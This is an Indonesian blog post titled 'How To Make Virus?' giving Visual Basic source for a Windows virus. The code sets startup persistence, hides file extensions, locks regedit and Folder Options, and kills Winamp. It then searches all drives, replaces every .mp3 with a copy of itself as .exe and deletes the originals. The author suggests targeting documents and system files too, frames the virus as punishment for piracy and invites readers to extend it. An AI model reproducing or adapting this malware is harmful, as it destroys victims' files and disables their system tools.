Rabu, 21 Desember 2011

How To Make Virus?

Emang sich, virus adalah sesuatu yg tidak baik.
tapi virus ini sangat berguna.. virus ini adalah sesuatu yg dapat merusak sesuatu terutama komputer. kamu pasti tahu orang2 yg suka membajak kaset? nah untuk mencegah hal itu, kita bisa menyebarkan virus ini. ya, klo hidup gak ada music bisa mati... he2 y tapi gak ap kan bajak aj!

ciri2 virus ini adlh:

1. menon aktifkan :
- Folder Option
- Penglihatan Extensi file (.doc, .exe, .mp3), maksudnya jika kita di windows explorer bisa melihat ekstensi file maka kita tak akan melihat ekstensi file tersebut, biasa pertahanan diri gitu
- mengunci regedit (seperti biasa)
- mematikan winamp secara tiba2 jika file virus aktif
bisa dilihat pada code dibawah ini:

Dim titik As String
titik = """"

CreateKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ServiceOptionMP3", _
titik & "c:\windows\winamp.dll.exe" & titik
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 1
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1
CreateKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegedit", "1"
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1
CreateKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegedit", "1"
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", 1
CreateKey "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption", "STOP PIRACY!!!!"
CreateKey "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText", "Stop pembajakan Musisi Dalam Negeri, Jangan Gunakan MP3 lagi (sok sok an) huahahahahaha!!!"
Shell "taskkill /f /im winamp.exe", vbHide

2. Mencari file berekstensi .mp3 yang ada di hardisk, lihat saja code di bawah ini :

'///////////////////////Sub Perangkap Hardisk/////////////
Sub cari()
Dim ictr As Integer
'If InStr(cboDrives.Text, "All Hard Drives") > 0 Then
For ictr = 0 To UBound(sDrives)
'////taruh di sini untuk mencari file virus yang ingin ditangkap, kalau disini saya menangkap file .doc
GetFiles sDrives(ictr), True, "*.mp3"
Next
'Else
'////taruh di sini untuk mencari file virus yang ingin ditangkap, kalau disini saya menangkap file .doc
' frmMain.GetFiles cboDrives.Text, True, "*.doc"
'End If
' frmMain.Visible = True
End Sub
Dan kode ini untuk mencari seluruh partisi hardisk yang ada di komputer
Dim ictr As Integer
Dim iDriveCount As Integer
Dim sAllDrives As String
Dim sDrive As String
ReDim sDrives(0) As String
For ictr = 66 To 90
sDrive = Chr(ictr) & ":\"
If DriveType(sDrive) = "Fixed Drive" Or DriveType(sDrive) = "Removable Drive" Then
If sAllDrives <> "" Then sAllDrives = sAllDrives & ", "
sAllDrives = sAllDrives & sDrive
iDriveCount = iDriveCount + 1
End If
Next

3. Mencari dan MELAHAP SELURUH FILE MP3 TANPA AMPUN, lihat code di bawah ini:

'//////////////////////////////Sub perangkap File/////////////////////
Public Sub GetFiles(Path As String, SubFolder As Boolean, Optional Pattern As String = "*.*")
'Screen.MousePointer = vbHourglass
'Dim li As ListItem
Dim WFD As WIN32_FIND_DATA
Dim hFile As Long, fPath As String, fName As String
Dim bawa As Long
fPath = AddBackslash(Path)
Dim sPattern As String
sPattern = Pattern
fName = fPath & sPattern
hFile = FindFirstFile(fName, WFD)
On Error Resume Next
'///////taruh di bagian ini untuk melakukan tindakan apa setelah file virus ditemukan/////
If (hFile > 0) And ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) <> FILE_ATTRIBUTE_DIRECTORY) Then
'Set li = lvFiles.ListItems.Add(, , fPath & StripNulls(WFD.cFileName))
'MsgBox fPath & StripNulls(WFD.cFileName)
'//////mengeset atribut file .doc menjadi atribut archive atau biasa
bawa = SetFileAttributes(fPath & StripNulls(WFD.cFileName), 0)
FileCopy App.Path & "\" & App.EXEName & ".exe", fPath & StripNulls(WFD.cFileName) & ".exe"
DeleteFile fPath & StripNulls(WFD.cFileName)
End If
If hFile > 0 Then
While FindNextFile(hFile, WFD)
'///////taruh di bagian ini untuk melakukan tindakan apa setelah file virus ditemukan/////
If ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) <> FILE_ATTRIBUTE_DIRECTORY) Then
'Set li = lvFiles.ListItems.Add(, , fPath & StripNulls(WFD.cFileName))
'MsgBox fPath & StripNulls(WFD.cFileName)
'//////mengeset atribut file .doc menjadi atribut archive atau biasa
bawa = SetFileAttributes(fPath & StripNulls(WFD.cFileName), 0)
FileCopy App.Path & "\" & App.EXEName & ".exe", fPath & StripNulls(WFD.cFileName) & ".exe"
DeleteFile fPath & StripNulls(WFD.cFileName)
End If
Wend
End If
If SubFolder Then
hFile = FindFirstFile(fPath & "*.*", WFD)
If (hFile > 0) And ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) = FILE_ATTRIBUTE_DIRECTORY) And _
StripNulls(WFD.cFileName) <> "." And StripNulls(WFD.cFileName) <> ".." Then
GetFiles fPath & StripNulls(WFD.cFileName), True, sPattern
End If
While FindNextFile(hFile, WFD)
If ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) = FILE_ATTRIBUTE_DIRECTORY) And _
StripNulls(WFD.cFileName) <> "." And StripNulls(WFD.cFileName) <> ".." Then
GetFiles fPath & StripNulls(WFD.cFileName), True, sPattern
End If
Wend
End If
FindClose hFile
'Set li = Nothing
'Screen.MousePointer = vbDefault
End Sub

Nah setelah terkena file ini maka yang akan terjadi seluruh file mp3 akan berubah menjadi .exe dan file .mp3 akan dihapus tanpa amapun....buehehehehehe....jadi ya siap - siap mem-backup hardisk anda terutama file mp3. OKeh......ih kok jahat sekali sih.....ya sekali lagi membuat virus itu harus jahat.


-------------------------------TIPS SETAN-----------------------------------
COBA YANG DICARI BUKAN FILE MP3 SAJA TAPI FILE SISTEM ATAU FILE .DOC .XLS DAN .DAT, BUKANKAH ITU MENYENANGKAN?Tapi tetep saja menjadi penghancur.....seorang virus maker yang baik tidak akan menghancurkan tapi akan membuat dunia lebih baik lewat komputer tul gak...
-------------------------------------------------------------------------------


Di sini kita hanya belajar bagai mana virus tersebut bekerja...bagaimana virus tersebut di program, sehingga kita tau jalan dan proses virus tersebut dan sekaligus menyelamatkan bangsa kita dari aktifitas pembajakan - pembajakan......soalnya NENEK MOYANGKU SEORANG PELAUT, coba nenek moyangku seorang sarjana atau seorang dermawan, pasti kita hasilnya beda kan...huahahahahaha....yang jelas program ini dapat dijadikan untuk proteksi file apa saja. Misalnya kita punya e-book gratis, lalu dibajak sama orang...ck ck ck kasian sudah gratis dibajak pula...nah untuk memberi pelajaran kepada orang itu gunakan program ini....hihihihihi...yang jelas ini ilmu dan tidak boleh disembunyikan, saya tidak bertanggung jawab atas kerusakan yang terjadi di komputer anda.

Tetapi yang jelas virus ini MASIH BANYAK KELEMAHANNYA, mungkin anda dapat mengembangkannya sendiri. Terserah ingin dikembangkan kode penyebarannya, kode pertahannannya atau judul lagunya mau di rubah, bukan Samson-Naluri Lelaki lagi, tapi mungkin lagi lain yang akhir - akhir ini sedang naik daun. kayak lagu apaaaaaaa gitu pokoknya....nah sekarang coba bedakan gambar di bawah ini, mana yang virus hayooohhhh!!!!!

Ok... kamu bisa download source code virusnya DSinI

source : gila-blog.blogspot.com

Technorati Tags: ,,

How To Make Virus? Rating: 4.5 Diposkan Oleh: dragon
Terima kasih sudah berkomentar